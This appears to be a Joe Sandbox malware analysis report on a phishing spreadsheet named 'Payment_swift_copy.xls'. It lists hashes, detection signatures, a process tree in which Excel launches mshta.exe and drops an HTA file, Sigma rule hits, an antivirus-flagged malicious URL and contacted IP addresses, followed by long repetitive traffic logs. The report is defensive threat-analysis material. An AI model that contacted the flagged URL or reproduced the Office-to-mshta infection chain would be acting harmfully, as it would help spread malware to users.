Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment_swift_copy.xls

Overview

General Information

Sample name:Payment_swift_copy.xls
Analysis ID:1575764
MD5:3c31b1b6455e98d02fde97673287f260
SHA1:10eb67ae8645458996d5eeb3101504ceaf446d85
SHA256:cf7373204fc102aa8f3d4ea5a8ac56db2d6227f0e9610c8089dfca7b3477034a
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Microsoft Office drops suspicious files
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w11x64_office
  • EXCEL.EXE (PID: 2696 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • mshta.exe (PID: 7052 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
    • splwow64.exe (PID: 1408 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • appidpolicyconverter.exe (PID: 7680 cmdline: "C:\Windows\system32\appidpolicyconverter.exe" MD5: 6567D9CF2545FAAC60974D9D682700D4)
    • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
  • EXCEL.EXE (PID: 8188 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Payment_swift_copy.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: File With Uncommon Extension Created By An Office Application
Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 2696, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0TF3KEZE\clearentirethingwithbestnoticetheeverythinggooodfrome[1].hta
Sigma detected: Suspicious Microsoft Office Child Process
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 2696, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 7052, ProcessName: mshta.exe
Sigma detected: Excel Network Connections
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 170.82.173.30, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2696, Protocol: tcp, SourceIp: 192.168.2.25, SourceIsIpv6: false, SourcePort: 49724
Sigma detected: Suspicious Office Outbound Connections
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.25, DestinationIsIpv6: false, DestinationPort: 49724, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2696, Protocol: tcp, SourceIp: 170.82.173.30, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://curt.wiz.co/SEyYcvw9Ev?&timeline=adorable&femaleAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Payment_swift_copy.xlsReversingLabs: Detection: 21%
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.25:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.25:49747 version: TLS 1.2

Software Vulnerabilities

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
Source: global trafficDNS query: name: curt.wiz.co
Source: global trafficDNS query: name: assets.msn.com
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 170.82.173.30:443 -> 192.168.2.25:49724
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
Source: global trafficTCP traffic: 192.168.2.25:49724 -> 170.82.173.30:443
